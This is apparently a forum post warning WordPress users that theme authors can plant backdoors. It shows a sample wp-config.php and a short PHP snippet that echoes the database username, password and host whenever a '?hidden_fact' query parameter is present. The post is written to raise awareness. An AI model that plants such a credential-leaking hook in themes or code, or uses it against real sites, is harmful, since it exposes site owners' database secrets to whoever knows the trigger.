Hey, I was thinking about this the other day. About how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so ill just give you an example:
WordPress, like pretty much every database driven website has a configuration file WordPress's file is located at: http://www.example.com/wp-config.php ( assuming you installed it to the root of your website ) inside it (once you have installed it) it will contain your username/password etc for your database, this is my configuration file ( its for my local server so it does'nt matter if you see it:
PHP Code:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sandbox');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Now, where am i going with this? Well, if you give him access to your website via FTP ( which there is no reason why you should need to ), then he can look at the contents of the file.
Another thing, which is my main point, and my biggest concern would be this, if I added this code to any wordpress theme ( i would have to have access to the source files of the theme ( aka the theme builder ):
PHP Code:
if( isset($_GET['hidden_fact']) ){
echo DB_USER . '<br/>';
echo DB_PASSWORD . '<br/>';
echo DB_HOST . '<br/>';
echo DB_USER . '<br/>';
}
Then if you went to your website: http://www.example.com/ then it looks fine, you have your new theme looks great, works great. But when the theme creator comes along, and does this: http://www.example.com/?hidden_fact then he/she gets your database information.
There are loads of similar things he/she could do, which is why i think if your going to use wordpress themes, then you should know basic PHP or basic Programming.
Sorry for the long post, but i felt its important you knew about the wp-config.php file aswell as the little trick.